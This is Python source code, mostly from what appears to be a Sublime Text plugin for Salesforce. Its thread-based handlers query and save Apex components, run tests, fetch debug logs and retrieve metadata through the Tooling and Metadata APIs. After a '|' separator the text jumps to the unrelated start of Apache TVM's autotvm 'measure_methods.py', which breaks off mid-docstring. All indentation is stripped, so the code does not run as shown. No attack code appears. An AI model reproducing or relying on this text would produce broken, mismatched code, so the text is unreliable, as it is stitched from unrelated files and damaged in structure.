with open(outputfile, "wb") as fp:
fp.write(util.query_to_csv(result, soql))
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_all, args=(soql, tooling,))
thread.start()
progress_message = "Export Query To %s.csv" % csv_name
ThreadProgress(api, thread, progress_message, progress_message + " Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_rest_test(operation, url, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
# If succeed
if "list" in result:
result = result["list"]
if "str" in result:
result = result["str"]
# If response result is just like '"{\\"name\\":\\"test\\"}"'
# we will remove the \\ and convert it to json automatically
if settings.get("remove_slash_for_rest_response", False):
try:
if "\\" in result:
result = result.replace("\\", "")
result = result[1:-1]
result = json.loads(result)
except:
pass
# Remove the useless success attribute
if isinstance(result, dict) and "success" in result:
del result["success"]
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/JavaScript/JSON.tmLanguage")
time_stamp = time.strftime("%H:%M:%S", time.localtime(time.time()))
view.run_command("new_view", {
"name": "Rest %s-%s" % (operation, time_stamp),
"input": json.dumps(result, ensure_ascii=False, indent=4)
})
settings = context.get_settings()
api = ToolingApi(settings)
http_methods_target = {
"Get": api.get,
"Delete": api.delete,
"Head": api.head,
"Put": api.put,
"Post": api.post,
"Query": api.query,
"Tooling Query": api.query,
"Query All": api.query_all,
"Retrieve Body": api.retrieve_body,
"Patch": api.patch,
"Search": api.search,
"Quick Search": api.quick_search
}
target = http_methods_target[operation]
if operation in ['Put', 'Post', 'Patch']:
thread = threading.Thread(target=target, args=(url, data,))
elif operation == "Tooling Query":
thread = threading.Thread(target=target, args=(url, True))
else:
thread = threading.Thread(target=target, args=(url,))
thread.start()
progress_message = "Execute Rest %s Test" % operation
ThreadProgress(api, thread, progress_message, progress_message + " Succeed", show_error=False)
handle_new_view_thread(thread, timeout)
def handle_execute_query(soql, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Query Result",
"input": json.dumps(result, indent=4)
})
# Keep the history in the local history rep
util.add_operation_history('execute_query', soql)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query, args=(soql,))
thread.start()
ThreadProgress(api, thread, "Execute Query", "Execute Query Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_anonymous(apex_string, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
if result["compiled"] == "false":
Printer.get('error').write(util.parse_execute_anonymous_xml(result))
else:
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Anonymous Result",
"input": util.parse_execute_anonymous_xml(result)
})
view.settings().set("is_debug_log", True)
# Keep the history apex script to local
util.add_operation_history('execute_anonymous', apex_string)
settings = context.get_settings()
api = ApexApi(settings)
thread = threading.Thread(target=api.execute_anonymous, args=(apex_string,))
thread.start()
ThreadProgress(api, thread, "Execute Anonymous", "Execute Anonymous Succeed")
handle_new_view_thread(thread, timeout)
def handle_fetch_debug_logs(user_full_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or "records" not in result:
return
records = result["records"]
debug_logs_table = util.format_debug_logs(settings, records)
Printer.get("log").write_start().write(debug_logs_table)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_logs, args=(settings["last_n_logs"], user_id,))
thread.start()
ThreadProgress(api, thread, "List Debug Logs for " + user_full_name,
"List Debug Logs for " + user_full_name + " Succeed")
handle_thread(thread, timeout)
def handle_create_debug_log(user_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flag, args=(user_id,))
thread.start()
ThreadProgress(api, thread, "Create Debug Log for " + user_name,
"Create Debug Log for " + user_name + " Succeed")
handle_thread(thread, timeout)
def handle_view_debug_log_detail(log_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Debug Log Detail",
"input": api.result["str"]
})
view.settings().set("is_debug_log", True)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/sobjects/ApexLog/" + log_id + "/Body"
thread = threading.Thread(target=api.retrieve_body, args=(url,))
thread.start()
ThreadProgress(api, thread, "Get Log Detail of " + log_id,
"Get Log Detail of " + log_id + " Succeed")
handle_thread(thread, timeout)
def handle_run_test(class_name, class_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# If error
if "success" in result and not result["success"]: return
if not result:
return Printer.get("error").write("%s is not a test class" % class_name)
# No error, just display log in a new view
test_result = util.parse_test_result(result)
view = sublime.active_window().new_file()
view.settings().set("word_wrap", "false")
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": test_result
})
# Keep the history in the local history rep
util.add_operation_history('Test/' + class_name, test_result)
# After run test succeed, get ApexCodeCoverageAggreate
query = "SELECT ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage " + \
"FROM ApexCodeCoverageAggregate"
thread = threading.Thread(target=api.query, args=(query, True,))
thread.start()
wait_message = "Get Code Coverage of " + class_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_code_coverage_thread(thread, view, timeout)
def handle_code_coverage_thread(thread, view, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_code_coverage_thread(thread, view, timeout), timeout)
return
# If error, just skip
result = api.result
if "success" in result and not result["success"]:
return
code_coverage = util.parse_code_coverage(result)
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": code_coverage,
"point": view.size()
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_test, args=(class_id,))
thread.start()
ThreadProgress(api, thread, "Run Test Class " + class_name, "Run Test for " + class_name + " Succeed")
handle_thread(thread, timeout)
def handle_run_sync_test(class_names, test_names, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if "success" in result and not result["success"]:
return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Coverage Report",
"input": util.parse_sync_test_coverage(result)
})
if settings["debug_mode"]:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Raw Response",
"input": json.dumps(result, indent=4)
})
# Keep the coverage to local cache
# codeCoverages = result["codeCoverage"]
# cache_dir = os.path.join(settings["workspace"], ".config")
# cache_file = os.path.join(cache_dir, "coverage.json")
#
# coverages = {}
# if not os.path.exists(cache_dir):
# os.makedirs(cache_dir)
# elif os.path.isfile(cache_file):
# coverages = json.loads(open(cache_file).read())
#
# # Upsert exist code coverage info
# for codeCoverage in codeCoverages:
# lowerName = codeCoverage["name"].lower()
# coverages[lowerName] = codeCoverage
#
# with open(cache_file, "w") as fp:
# fp.write(json.dumps(coverages, indent=4))
# Get the latest debug log
sublime.active_window().run_command('fetch_debug_log', {
"fetch_self": True
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_tests_synchronous, args=(class_names[0], test_names))
thread.start()
wait_message = "Running Sync Test Classes%s" % (
" for %s" % class_names[0] if len(class_names) == 1 else ""
)
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_thread(thread, timeout)
def handle_fetch_code_coverage(file_name, body, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if "size" not in result or result["size"] == 0:
return Printer.get("error").write("No code coverage for %s, " % file_name +
"please run related test class before view code coverage")
record = result["records"][0]
util.view_coverage(file_name, record, body)
# Setup and start the thread
settings = context.get_settings()
api = ToolingApi(settings)
q_str = "Select ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage" + \
" From ApexCodeCoverageAggregate Where ApexClassOrTrigger.Name = '%s'" % file_name
thread = threading.Thread(target=api.query, args=(q_str, True))
thread.start()
wait_message = "Get Code Coverage of " + file_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_thread(thread, timeout)
def handle_generate_sobject_soql(sobject, filter, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error Message are prcoessed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": sobject + " SOQL",
"input": result["soql"]
})
# Keep sobject describe history
util.add_operation_history('SOQL/' + sobject, result["soql"])
settings = context.get_settings()
api = ToolingApi(settings)
if filter != "all":
args = (sobject, filter,)
else:
args = (sobject,)
thread = threading.Thread(target=api.combine_soql, args=args)
thread.start()
wait_message = 'Generate SOQL for ' + sobject
ThreadProgress(api, thread, wait_message, wait_message + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_describe_sobject(sobject, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error Message are prcoessed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.settings().set("word_wrap", False)
describe_result = util.parse_sobject_field_result(result)
view.run_command("new_view", {
"name": sobject + " Describe Result",
"input": describe_result
})
view.set_syntax_file("Packages/Textile/Textile.tmLanguage")
# Keep sobject describe history
util.add_operation_history('describe/' + sobject, describe_result)
settings = context.get_settings()
api = ToolingApi(settings)
sobject_url = "/sobjects/" + sobject + "/describe"
thread = threading.Thread(target=api.get, args=(sobject_url,))
thread.start()
ThreadProgress(api, thread, 'Describe ' + sobject, 'Describe ' + sobject + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_export_specified_workbooks(sobjects, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
threads = []
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for cs in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(cs,))
threads.append(thread)
thread.start()
ThreadsProgress(threads, "Generating Sobjects Workbook",
"Sobjects Workbook are Generated")
def handle_export_all_workbooks(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Exception Process
if not api.result["success"]: return
# If succeed
sobjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sobjects.append(sd["name"])
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for sobjects in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(sobjects,))
thread.start()
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_new_project(is_update=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If failed, but something may happen,
# for example, user password is expired
result = api.result
if not result or not result["success"]: return
# Extract the apex code to workspace
extract_to = settings["workspace"]
# Just remove the packages folder and src folder
if os.path.exists(extract_to):
# Remove packages directory
if os.path.exists(os.path.join(extract_to, "packages")):
try:
shutil.rmtree(os.path.join(extract_to, "packages"))
except Exception as e:
pass
# Makedir for subscribed meta types
for metadata_folder in settings["subscribed_metadata_folders"]:
outputdir = os.path.join(extract_to, "src", metadata_folder)
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Extract the zipFile to extract_to
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to,))
thread.start()
# Apex Code Cache
if "fileProperties" in result and isinstance(result["fileProperties"], list):
util.reload_file_attributes(result["fileProperties"], settings)
else:
if settings["debug_mode"]:
print('[Debug] fileProperties:\n' + json.dumps(result, indent=4))
# Hide panel
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Reload sObject Cache and SymbolTables
if not is_update:
handle_reload_sobjects_completions()
if settings["reload_symbol_tables_when_create_project"]:
handle_reload_symbol_tables()
# Write the settings to local cache
# Not keep the confidential info to .settings
# Since 2015.11.26, stop to keep settings.json
# del settings["projects"]
# del settings["password"]
# del settings["default_project"]
# util.add_config_history('settings', settings, settings)
settings = context.get_settings()
api = MetadataApi(settings)
types = {}
for xml_name in settings["subscribed_metadata_objects"]:
types[xml_name] = ["*"]
thread = threading.Thread(target=api.retrieve, args=({
"types": types,
"package_names": settings["allowed_packages"]
},))
thread.start()
wating_message = ("Creating New " if not is_update else "Updating ") + " Project"
ThreadProgress(api, thread, wating_message, wating_message + " Finished")
handle_thread(thread, timeout)
def handle_describe_metadata(callback_options, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Exception is processed in ThreadProgress
if not api.result or not api.result["success"]: return
result = api.result
del result["success"]
settings = context.get_settings()
cache_dir = os.path.join(settings["workspace"], ".config")
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
cache_file = os.path.join(cache_dir, "metadata.json")
with open(cache_file, "w") as fp:
fp.write(json.dumps(result, indent=4))
if "callback_command" in callback_options:
settings = context.get_settings()
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
# If project already have subscribed_metadata_objects, just stop
if "subscribed_metadata_objects" in settings["default_project"] and \
settings["default_project"]["subscribed_metadata_objects"]:
return sublime.active_window().run_command(callback_command, args)
# If project doesn't have subscribed_metadata_objects, we need
# to choose which metadata_objects to subscribe, which will be saved
# into default project
sublime.active_window().run_command("toggle_metadata_objects", {
"callback_options": callback_options
})
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=("describeMetadata",))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Describe Metadata of v%s.0" % settings["api_version"],
"Describe Metadata Finished")
def handle_rename_metadata(file_name, meta_type, old_name, new_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If not succeed, just stop
if not api.result or not api.result["success"]: return
result = api.result
if "errors" in result:
return Printer.get("error").write(result["errors"]["message"])
os.rename(file_name, file_name.replace(old_name, new_name))
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
options = {"type": meta_type, "old_name": old_name, "new_name": new_name}
thread = threading.Thread(target=api._invoke_method, args=("renameMetadata", options,))
thread.start()
handle_thread(thread, timeout)
message = "Renaming %s from %s to %s" % (
meta_type, old_name, new_name
)
ThreadProgress(api, thread, message, "Renaming Finished")
def handle_reload_project_cache(types, callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result or not api.result["success"]: return
types = api.result["types"]
cache_dir = os.path.join(settings["workspace"], ".config")
cache_file = os.path.join(cache_dir, "package.json")
cache = types
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
elif os.path.isfile(cache_file):
cache = json.loads(open(cache_file).read())
for _type in types:
cache[_type] = types[_type]
with open(cache_file, "w") as fp:
fp.write(json.dumps(cache, indent=4))
if callback_command:
sublime.active_window().run_command(callback_command)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.prepare_members, args=(types, True,))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Reloading Project Cache", "Reload Project Cache Succeed")
def handle_retrieve_package(types, extract_to, source_org=None, ignore_package_xml=False, timeout=120):
"""
Retrieve package via Metadata API
@param types: metadata type dict like {"AuraDefinitionBundle":["aura1", "aura2"]}
@param extract_to: target settings["workspace"]
@param source_org: source Salesforce org
@param ignore_package_xml: ignore package xml file
@param timeout: timeout in seconds
@return: None
"""
def handle_thread(_thread, timeout):
if _thread.is_alive():
sublime.set_timeout(lambda: handle_thread(_thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
# Extract the zipFile to extract_to
if api.result and api.result["success"]:
_thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(api.result["zipFile"], extract_to, ignore_package_xml,))
_thread.start()
# Code Cache in component metadata settings for saving file to server functionality
# print("fileProperties:", api.result.get("fileProperties", None))
if isinstance(api.result.get("fileProperties", None), list):
util.reload_file_attributes(
api.result["fileProperties"],
settings, append=True
)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types},))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread,
"Retrieve File From Server",
"Retrieve File From Server Succeed")
def handle_save_to_server(file_name, is_check_only=False, timeout=120):
"""
Handle Save metadata to Salesforce via Tooling API
@param file_name: file name with path format
@param is_check_only: only check the file from Salesforce, do not really save
@param timeout: timeout in seconds
@return: None
"""
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Set Thread alive flag to False
globals()[username + file_base_name] = False
# Process request result
result = api.result
# If cancel, just diff with server
if "Operation" in result and result["Operation"] == "cancel":
handle_diff_with_server(component_attribute, file_name)
return
if "success" in result and result["success"]:
# 1. Write succeed body to local change history
if settings["keep_local_change_history"] and not is_check_only:
# Append message to output panel
Printer.get('log').write("Start to keep local change history")
# Get Workspace, if not exist, make it
workspace = settings["workspace"] + "/.history/" + component_attribute["type"]
if not os.path.exists(workspace):
os.makedirs(workspace)
# Backup current file
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
output_dir = workspace + "/" + component_name + "-" + time_stamp + "-history" + extension
with open(output_dir, "wb") as fp:
fp.write(body.encode("utf-8"))
# Output succeed message in the console
save_or_compile = "Compiled" if is_check_only else "Saved"
Printer.get('log').write("%s %s successfully" % (save_or_compile, file_base_name))
# Add total seconds message
dt = datetime.datetime.now() - start_time
total_seconds = dt.seconds + dt.microseconds / 1e6
Printer.get('log').write("\nTotal time: %.2f seconds" % total_seconds, False)
# Remove highlight
view = util.get_view_by_file_name(file_name)
if view:
component_id = component_attribute["id"]
view.run_command("remove_check_point", {"mark": component_id + "build_error"})
# If succeed, just hide it in several seconds later
delay_seconds = settings["delay_seconds_for_hidden_output_panel_when_succeed"]
sublime.set_timeout_async(Printer.get("log").hide_panel, delay_seconds * 1000)
# If track_log_after_saved is true, track self debug log asynchronously
if settings["track_log_after_saved"]:
thread = threading.Thread(target=api.create_trace_flag)
thread.start()
# After all are finished, keep the LastModifiedDate
handle_set_component_attribute(component_attribute)
# If not succeed, just go to the error line
# Because error line in page is always at the line 1, so just work in class or trigger
elif "success" in result and not result["success"]:
print('error result', result)
# Maybe network issue
_message = "Unknown Problem!"
if "problem" in result:
_message = "Compile Error for %s: %s at line %s column %s" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
elif "message" in result:
_message = result["message"]
Printer.get('log').write(_message)
# Get the active view
view = util.get_view_by_file_name(file_name)
# Check current view the saving code file
if not view or not view.file_name(): return
if not file_base_name in view.file_name(): return
if not extension in [".trigger", ".cls", ".page", ".cmp", '.js', '.css']: return
if "line" in result:
line = result["line"]
elif "lineNumber" in result:
line = result["lineNumber"]
else:
return
if isinstance(line, list): line = line[0]
if extension == ".page" and line < 2: return
view.run_command("goto_line", {"line": line})
view.run_command("expand_selection", {"to": "line"})
if hasattr(view, 'show_popup'):
error = """
<div>
<h3>Compile Error for %s</h3>
<p style="color: red">
<b>%s</b> at line <b>%s</b> column <b>%s</b>
</p>
</div>
""" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
view.show_popup(error)
# Add highlight for error line and remove the highlight after several seconds
component_id = component_attribute["id"]
view.run_command("set_check_point", {"mark": component_id + "build_error"})
# 1. Get component attribute and body content
component_attribute, component_name = util.get_component_attribute(file_name)
body = open(file_name, encoding="utf-8").read()
# Component Full Name
extension = component_attribute["extension"]
file_base_name = component_name + extension
# Log start_time
start_time = datetime.datetime.now()
# If saving is in process, just skip
settings = context.get_settings()
username = settings["username"]
if username + file_base_name in globals():
is_thread_alive = globals()[username + file_base_name]
if is_thread_alive:
print('%s is in process' % file_base_name)
return
# Open panel
compile_or_save = "compile" if is_check_only else "save"
Printer.get('log').write_start().write("Start to %s %s" % (compile_or_save, file_base_name))
api = ToolingApi(settings)
lngt_meta_type = ["AuraDefinitionBundle", "AuraDefinition",
"LightningComponentBundle", "LightningComponentResource"]
if component_attribute["type"] in lngt_meta_type:
target = api.save_lightning_to_server
else:
target = api.save_to_server
thread = threading.Thread(target=target,
args=(component_attribute, body, is_check_only,))
thread.start()
# If saving thread is started, set the flag to True
globals()[username + file_base_name] = True
# Display thread progress
wait_message = ("Compiling " if is_check_only else "Saving ") + component_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed", show_error=False)
handle_thread(thread, timeout)
def handle_create_component(data, component_name, component_type, markup_or_body, file_name, timeout=120):
"""
Handle create Apex Class/Trigger/Page/Component via Tooling API
@param data: component data to create, dict like {"name": "Aclass.cls", "body": content_body}
@param component_name: component name without extension
@param component_type: component type in [ApexClass, ApexPage, ApexTrigger, ApexComponent]
@param markup_or_body: content of the code
@param file_name: os file path
@param timeout: timeout in second
@return: None
"""
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If create Succeed
result = api.result
# If created failed, just remove it
if not result["success"]:
os.remove(file_name)
return
# If created succeed, just open it
sublime.active_window().open_file(file_name)
# Get the created component id
component_id = result.get("id")
extension = "." + settings[component_type]["suffix"]
# Save it to component.sublime-settings
s = sublime.load_settings(COMPONENT_METADATA_SETTINGS)
username = settings["username"]
components_dict = s.get(username, {})
# Prevent exception for creating component if no component in org
if component_type not in components_dict:
if not components_dict:
components_dict = {component_type: {}}
else:
components_dict[component_type] = {}
# Build components dict
lower_name = component_name.lower()
attributes = {
"id": component_id,
"name": component_name,
"url": post_url + "/" + component_id,
"body": markup_or_body,
"extension": extension,
"type": component_type,
"is_test": lower_name.startswith("test") or lower_name.endswith("test")
}
components_dict[component_type][full_name.lower()] = attributes
s.set(username, components_dict)
# Save settings and show success message
sublime.save_settings(COMPONENT_METADATA_SETTINGS)
# After new component is stored into cache, reload cache in globals()
sublime.set_timeout(lambda: util.load_metadata_cache(True), 50)
# Create Meta.xml File
if component_type in ["ApexClass", "ApexTrigger"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + \
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" + \
" <apiVersion>{1}.0</apiVersion>\n" + \
" <status>Active</status>\n" + \
"</{0}>").format(component_type, settings["api_version"])
elif component_type in ["ApexPage", "ApexComponent"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + \
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" + \
" <apiVersion>{1}.0</apiVersion>\n" + \
" <label>{2}</label>\n" + \
"</{0}>").format(component_type, settings["api_version"], component_name)
# Generate new meta.xml file
with open(file_name + "-meta.xml", "w") as fp:
fp.write(meta_file_content)
# After all are finished, we need to keep the lastModifiedDate
handle_set_component_attribute(attributes)
settings = context.get_settings()
api = ToolingApi(settings)
post_url = "/sobjects/" + component_type
thread = threading.Thread(target=api.post, args=(post_url, data,))
thread.start()
full_name = os.path.basename(file_name)
ThreadProgress(api, thread, "Creating Component %s" % full_name,
"Creating Component %s Succeed" % full_name)
handle_thread(thread, timeout)
def handle_set_component_attribute(attributes, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if result["success"] and result["records"]:
lastModifiedDate = result["records"][0]["LastModifiedDate"]
util.set_component_attribute(attributes, lastModifiedDate)
elif settings["debug_mode"]:
pprint.pprint(result)
# Refresh metadata cache
util.load_metadata_cache(True)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT LastModifiedDate FROM %s WHERE Id = '%s'" % (
attributes["type"], attributes["id"]
)
thread = threading.Thread(target=api.query, args=(soql, True,))
thread.start()
handle_thread(thread, timeout)
def handle_refresh_static_resource(component_attribute, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
with open(file_name, "wb") as fp:
fp.write(api.result["body"].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
url = component_attribute["url"] + "/body"
thread = threading.Thread(target=api.retrieve_body, args=(url,))
thread.start()
ThreadProgress(api, thread, 'Refresh StaticResource', 'Refresh StaticResource Succeed')
handle_thread(thread, timeout)
def handle_create_static_resource(data, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result["success"]:
return
print(api.result)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/tooling/sobjects/StaticResource"
thread = threading.Thread(target=api.post, args=(url, data,))
thread.start()
ThreadProgress(api, thread, 'Creating StaticResource', 'Creating StaticResource Succeed')
handle_thread(thread, timeout)
def handle_diff_with_server(component_attribute, file_name, source_org=None, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
# If error, just skip, error is processed in ThreadProgress
if not result["success"]: return
# Diff Change Compare
diff.diff_changes(file_name, result)
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(component_attribute["url"],))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, 'Diff With Server', 'Diff With Server Succeed')
def handle_refresh_file_from_server(attr, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
with open(file_name, "wb") as fp:
fp.write(result[attr["body"]].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(attr["url"],))
thread.start()
ThreadProgress(api, thread, 'Refreshing %s' % os.path.basename(file_name), 'Refresh Succeed')
handle_thread(thread, timeout)
def handle_delete_component(component_url, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# Get active window
window = sublime.active_window()
# Remove file from disk and close related view
view = util.get_view_by_file_name(file_name)
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name)
# Remove the related cls-meta.xml
if os.path.exists(file_name + "-meta.xml"):
view = util.get_view_by_file_name(file_name + "-meta.xml")
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name + "-meta.xml")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.delete, args=(component_url,))
thread.start()
file_base_name = os.path.basename(file_name)
ThreadProgress(api, thread, "Deleting " + file_base_name,
"Delete " + file_base_name + " Succeed")
handle_thread(thread, timeout)
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
import tvm.ir.transform
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar, cc
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
"""
Stores all the necessary inputs for a measurement.
Parameters
----------
filename : str
The filename of generated library
arg_info : Tuple
The shape and dtype information of tvm tensor arguments
error : Exception
The error happens during compilation.
time_cost : float
The time cost of building
"""
class LocalBuilder(Builder):
"""Run compilation on local machine
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
